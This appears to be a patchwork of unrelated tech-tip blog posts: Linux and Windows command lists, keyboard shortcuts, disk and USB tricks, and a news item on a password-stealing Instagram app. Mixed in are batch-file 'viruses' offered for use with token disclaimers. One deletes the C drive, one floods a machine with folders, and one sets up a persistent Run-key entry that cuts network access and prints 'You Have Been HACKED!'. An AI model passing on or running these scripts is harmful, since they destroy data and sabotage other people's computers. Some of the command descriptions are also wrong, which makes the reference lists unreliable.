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Linux basic commands used commonly

Basic Linux Commands That i know...
Here is basic Linux commands available in common at any Linux platforms. This commands manual pages can be retrieve with use this command with term man in command prompt.
adduser - Create New User Account
awk - Find and Replace text withing Files
cal - Open Calender Application
cat - Concatenate files and print on the standard output
cd - Change working directory
chown - Change the group ownership of files
chmod - Change the access permissions of files and directories
chroot - Change root directory
clear - Clear terminal screen
cmp - Compare two files
comm - Compare two sorted files line by line
cp - Copy one or more files to another location
cron - Daemon to execute scheduled commands
crontab - Schedule a command to run at a later time
cut - Divide a file into several parts
date - Display or change the date & time
df - Display free disk space
diff - Display the differences between two files
dir - Briefly list directory contents
du - Estimate file space usage
echo - Display message on screen
eject - Eject CD-ROM
env Display, set, or remove environment variables
fdisk - Partition table manipulator for Linux
fgrep - Search file(s) for lines that match a fixed string
find - Search for files that meet a desired criteria
fmt - Reformat paragraph text
format - Format disks or tapes
fsck - Filesystem consistency check and repair
grep - Search file(s) for lines that match a given pattern
groups - Print group names a user is in
gzip - Compress or decompress named file(s)
head - Output the first part of file(s)
hostname - Print or set system name
info - Help info
install - Copy files and set attributes
kill - Stop a process from running
less - Display output one screen at a time
ln - Make links between files
locate - Find files
logname - Print current login name
ls - List information about file(s)
man - Help manual
mkdir - Create new folder(s)
more - Display output one screen at a time
mount - Mount a file system
mv - Move or rename files or directories
nohup - Run a command immune to hangups
passwd - Modify a user password
paste - Merge lines of files
pathchk - Check file name portability
pr - Convert text files for printing
printcap - Printer capability database
printenv - Print environment variables
printf - Format and print data
ps - Process status
pwd - Print Working Directory
ram - ram disk device
rcp - Copy files between two machines
rm - Remove files
rmdir - Remove folder(s)
rpm - Remote Package Manager
sleep - Delay for a specified time
sort - Sort text files
split - Split a file into fixed-size pieces
su - Substitute user identity
sum - Print a checksum for a file
symlink - Make a new name for a file
sync - Synchronize data on disk with memory
tac - Concatenate and write files in reverse
tail - Output the last part of files
tar - Tape Archiver
tee - Redirect output to multiple files
test - Evaluate a conditional expression
time - Measure Program Resource Use
touch - Change file timestamps
top - List processes running on the system
traceroute - Trace Route to Host
true - Do nothing, successfully
tsort - Topological sort
tty - Print filename of terminal on stdin
umount - Unmount a device
uname - Print system information
uniq - Uniquify files
units - Convert units from one scale to another
unshar - Unpack shell archive scripts
useradd - Create new user account
usermod - Modify user account
uuencode Encode a binary file
wc - Print byte, word, and line counts
whereis - Report all known instances of a command
which - Locate a program file in the user's path
who - Print all usernames currently logged in
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Write protection allows a drive or SD card to keep its contents from being changed. This effectively prevents you from using the drive in any sort of meaningful way. There are many ways to disable write protection, from toggling a physical switch to delving into your computer’s advanced settings. However, if the drive has been corrupted, formatting it to a blank slate may be your only option.

Change the sharing permissions. Some devices, but not all, will let you change the sharing permissions even if write protection is enabled. If you are using a Windows computer, right click the device icon and select Share → Advanced Settings → Permissions. Check the “full control” box, and select OK.
  • If the error message you get tells you the file is write-protected, not the drive or memory card, skip to the section on disabling write protection for files instead.
Enter “cmd” in the Start menu. To access the command line in Windows, open the Start menu and type cmd in the search field. Press Enter, and a command window should pop up.
  • The command line does not use your cursor. Just type, and use “delete” or the arrow keys on your keyboard to move back to correct a mistake.
Enter “list disk.” Type list disk and hit Enter. This will list all disks accessible on your computer, include the USB Drive or memory card. If you don’t know which drive listed is the write-protected device, find the icon of the device in your My Computer folder and note its name before you continue.
  • You can also identify the device by ejecting it, typing “list disk” again, and seeing which disk disappeared.
  • If your device does not appear, try “list volume” instead. In this case, you’ll need to replace the commands below with “volume” wherever they use “disk.”
elect the disk. Once you’re sure which disk is yours, type select disk X, replacing X with the number of the disk. (For example, type select disk 2 if disk 2 is the write-protected device.)
Type “attributes disk clear readonly” and press enter. The command attributes disk clear readonly should remove any write protection on the disk if it exists.

  • Type the command exactly as shown. “readonly” is one word.
    Exit disk utility. Type exit and press Enter to quit disk utility
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Enabling HTTPS in Blogger? Think Twice for SEO Disadvantages
Do you want to enable HTTPS integration to your BlogSpot domain? If yes, you must read this article before switching over HTTPS from HTTP in your Blogger sub-domain. Yes, I know you have heard that HTTPS is now a ranking signal that can boost your rank slightly. I have taken a look on HTTPS enabled blogspot blog, and found major SEO disadvantages that you must know before applying it on your sub-domain. Enabling HTTPS for your blog cannot be a bad thing for SEO, but due to the functionality Blogger provides in the current time is not suitable for better SEO, since recently Blogger has announced HTTPS support for Blogger. Google is yet to announce HTTPS support for custom domains, currently it is only available for blogspot sub-domains. I will suggest you to wait for announcing it for custom domains, and some basic functionality to be working fine. I will update this article as the things going to perfect for the blogspot users. You may subscribe our newsletter or simply like us on Facebook to update with the latest news on Blogger. In this article, we will talk about the major issues if you enable HTTPS support in Blogger. Before turning on this feature, you should wait for fixing the issue by Google.

Blogger HTTPS Support and SEO Disadvantes
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Apple and Google removed the app to Instagram, hundreds of thousands of stolen passwords
Apple and Google removed the app to Instagram, hundreds of thousands of stolen passwords. From the application store for the operating systems Android and iOS have removed one of the most popular third-party application for social network Instagram. Its creators are accused of stealing passwords and placing images on the tape users without their knowledge, reports The Verge.

Apple and Google removed the app to Instagram, hundreds of thousands of stolen passwords

Appendix InstaAgent collects data about your account and password, and then sent them unencrypted on unknown servers. This became known thanks to one iOS-developer who shared his unexpected discovery on Twitter. Several hours later, as the news is widely sold on the Internet, Google and Apple have taken action and removed the app from the store.

The administration Instagram reminded that it is not advised to use third-party development to access your account in the photosets. InstaAgent managed to become popular and to climb to the top spot ranking on Google Play and AppStore, allowing users to see who comes to their profiles.

How To Make more than thousands of folder Using notepad.

1. Open notepad.
2. Copy the following code:
@echo off
md %random%
goto top
3. save it as fun.bat
If you will open that file that folder will be rained by more than thousand of folders. It will not cause any harm to your computer, if you want you can try this.
Also share:-- with your friends

    I'll not be responsible for any harm by this trick and post, Do at your own risk I'll not be responsible for anything done
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Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
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Facebook Invisible name id

Go to setting>general>language
choose Japaneses language.
go to google and search write this "Japanese converter"

and change your name in Japanese
and then back on Facebook and go to

and write your in first and last box
and middle box empty

and click continue.
and write Your Facebook Password

and click save now enjoy all friends
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How To Create a Virus in Less Than 60 seconds?
Today we are here with the method to How To Create a Virus in Less Than 60 seconds. Today every second person is using computer and almost everyone of them knows about virus. Virus is a malicious program that enters into computer without your permission and can affect your data and operating system working. Well viruses are of different types as there are trojan horse and many more. But did you think about creating a virus. Yes you can do it just within 60 seconds. And it is possible with a very simple and easy method that i have discussed in this post, so just read out the below to proceed.
Many of you will think the method will be of great coding, but there is nothing like that , you just have to write 5-6 words to create a very harmful virus that can even format the computer drive completely. The trick is based on notepad and some words of batch program that will run automatically when it opens in a computer system and will format the selected drive and may corrupt the operating system of that computer. Just follow up the below steps for creating a virus within a minute.
First of all in your windows OS open the notepad.
Now copy and paste the below code in your notepad screen.
@Echo off
Del C:\ *.* |y
Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
Now running this virus file will delete the C drive completely and the operating system of the respective computer will get corrupted.
This method is only for knowledge purpose. Don’t try this in your computer as it will completely format your C drive.

   I'll not be responsible for any harm by this trick. do this as your on risk.
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How To Remotely Shutdown PC From Anywhere With Smartphone?
or Smartphone and PC user we are here with a cool trick for How To Remotely Shutdown PC From Anywhere With Smartphone. Today your smartphone are really smart and can be used for lots of purpose in this tech world. Till now we had discussed so many cool tricks for smartphones and we are again here with a cool method to shutdown your windows PC using phone. Yes it is possible you can implement this and can remotely shutdown your PC with your mobile from anywhere by just sending a shutdown request to your computer over internet. So have a look on complete guide below.
Steps To Shutdown PC With Smartphone Remotely:
1.First of in your windows PC download and install the program Airytec switch off.
2.Now install the app and you will see shutdown icon in system tray.
3.Click on the icon and tick the options there according to your need like Force shutdown should be enabled
4.Now right click on shutdown icon and click on setting and there click on remote section there.
5.Now click on Edit Webinterface Settings there.
6.There enable Webinterface and remain the Authentication unchecked and click on apply button.
7.Now click on view / update static addresses and note down the Shutdown URL there and for easy interface you can bookmark this URL in Your Mobile.
8.Now double click on shutdown icon in system tray and enable task.
9.Now open the URL in your mobile and you will see interface.
10.Now click on shutdown button to shut your computer and process will start.
11.Thats it you are done, using this now you can easily shutdown your computer from any where using your phone.
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Virus to disable Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!

   I'll not be responsible for any harm by this this trick. Do this as your own risk.
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 How To Lock/Unlock Your PC Using USB Flash Drive?
Till now you logged in your computer using your passwords and pins etc, but today i have a new method to lock and unlock into your computer which is far cool than these traditional methods. Now after reading our this post you will be logging in your computer using your USB flash drive. Yes this is actually possible you can make your computer start with your pendrive as you might seen in many Hollywood movies. Now you will do that in your PC. The process is very simple and easy ans you can implement this in few steps that i have discussed below.
In this method you will set the whole setup in such a way that when you enter the computer you will launch a program from your USB drive and then you will do all your work and after your work you will remove your USB drive and then your keyword and mouse will get locked until you again come and insert that USB drive in your computer. Just follow the below steps to proceed.
1.First of all download and install the software Predator in your computer and this will be in zip format, unzip and install it.
2.Now it will ask you to set password and recovery key, insert the USB and click on OK.
3.Here you can set any password of your choice and also you have select the particular pendrive that will open your computer to avoid misuse using any other pendrive.
4.Now your USB is ready to use. Now every time you logged in your computer just insert the USB and launch the software and stay back and do your work and after your work remove it.
5.Your computer will get automatically locked and after that when you put usb back your computer will get unlocked.
6.And by any chance if you lost or misplace your USB then you can use your recover that with your password that you have set while intializing this software.
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how to see data of usb...
just press windows botton +r
type cmd
paste this command
attrib -h -r -s /s /d k:\*.*

replace k with your drive latter and hit enter
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All CMD Commands 2015 – CMD Tricks 2015
Here are CMD Tricks 2015, All CMD Commands 2015 – I’m going to share list of all CMD Commands 2015 List – Command Prompt is one of the most powerful tools in Windows. Things were not always like this; but with the advent of GUI based operating systems, people started feeling that computing through command based tools was boring. This ultimately lead the command prompt into obscurity.However, the command prompt is not useless. In fact, it can be pretty useful. This article provides some excellent tricks, secrets and hacks that will make you realize that the Windows Command Prompt is not only useful but also a tool that you should definitely give more respect to by knowing these cool cmd commands 2015.
List of All CMD Commands – CMD Tricks 2015
First of all open the CMD by clocking on START > RUN > CMD.
Then type these CMD Commands 2015 :-
1. Accessibility Controls – access.cpl
2. Accessibility Wizard – accwiz
3. Add Hardware Wizard – hdwwiz.cpl
4. Add/Remove Programs – appwiz.cpl
5. Administrative Tools – control admintools
6. Automatic Updates – wuaucpl.cpl
7. Bluetooth Transfer Wizard – fsquirt
8. Calculator – calc
9. Certificate Manager – certmgr.msc
10. Character Map – charmap
11. Check Disk Utility – chkdsk
12. Clipboard Viewer – clipbrd
13. Command Prompt – cmd
14. Component Services – dcomcnfg
15. Computer Management – compmgmt.msc
16. Control Panel – control
17. Date and Time Properties – timedate.cpl
18. DDE Shares – ddeshare
19. Device Manager – devmgmt.msc
20. Direct X Troubleshooter – dxdiag
21. Disk Cleanup Utility – cleanmgr
22. Disk Defragment – dfrg.msc
23. Disk Management – diskmgmt.msc
24. Disk Partition Manager – diskpart
25. Display Properties – control desktop
26. Display Properties – desk.cpl
27. Dr. Watson System Troubleshooting Utility – drwtsn32
28. Driver Verifier Utility – verifier
29. Event Viewer – eventvwr.msc
30. Files and Settings Transfer Tool – migwiz
31. File Signature Verification Tool – sigverif
32. Findfast – findfast.cpl
33. Firefox – firefox
34. Folders Properties – control folders
35. Fonts – control fonts
36. Fonts Folder – fonts
37. Free Cell Card Game – freecell
38. Game Controllers – joy.cpl
39. Group Policy Editor (for xp professional) – gpedit.msc
40. Hearts Card Game – mshearts
41. Help and Support – helpctr
42. HyperTerminal – hypertrm
43. Iexpress Wizard – iexpress
44. Indexing Service – ciadv.msc
45. Internet Connection Wizard – icwconn1
46. Internet Explorer – iexplore
47. Internet Properties – inetcpl.cpl
48. Keyboard Properties – control keyboard
49. Local Security Settings – secpol.msc
50. Local Users and Groups – lusrmgr.msc
51. Logs You Out Of Windows – logoff
52. Malicious Software Removal Tool – mrt
53. Microsoft Chat – winchat
54. Microsoft Movie Maker – moviemk
55. Microsoft Paint – mspaint
56. Microsoft Syncronization Tool – mobsync
57. Minesweeper Game – winmine
58. Mouse Properties – control mouse
59. Mouse Properties – main.cpl
60. Netmeeting – conf
61. Network Connections – control netconnections
62. Network Connections – ncpa.cpl
63. Network Setup Wizard – netsetup.cpl
64. Notepad – notepad
65. Object Packager – packager
66. ODBC Data Source Administrator – odbccp32.cpl
67. On Screen Keyboard – osk
68. Outlook Express – msimn
69. Paint – pbrush
70. Password Properties – password.cpl
71. Performance Monitor – perfmon.msc
72. Performance Monitor – perfmon
73. Phone and Modem Options – telephon.cpl
74. Phone Dialer – dialer
75. Pinball Game – pinball
76. Power Configuration – powercfg.cpl
77. Printers and Faxes – control printers
78. Printers Folder – printers
79. Regional Settings – intl.cpl
80. Registry Editor – regedit
81. Registry Editor – regedit32
82. Remote Access Phonebook – rasphone
83. Remote Desktop – mstsc
84. Removable Storage – ntmsmgr.msc
85. Removable Storage Operator Requests – ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) – rsop.msc
87. Scanners and Cameras – sticpl.cpl
88. Scheduled Tasks – control schedtasks
89. Security Center – wscui.cpl
90. Services – services.msc
91. Shared Folders – fsmgmt.msc
92. Shuts Down Windows – shutdown
93. Sounds and Audio – mmsys.cpl
94. Spider Solitare Card Game – spider
95. SQL Client Configuration – cliconfg
96. System Configuration Editor – sysedit
97. System Configuration Utility – msconfig
98. System Information – msinfo32
99. System Properties – sysdm.cpl
100. Task Manager – taskmgr
101. TCP Tester – tcptest
102. Telnet Client – telnet
103. User Account Management – nusrmgr.cpl
104. Utility Manager – utilman
105. Windows Address Book – wab
106. Windows Address Book Import Utility – wabmig
107. Windows Explorer – explorer.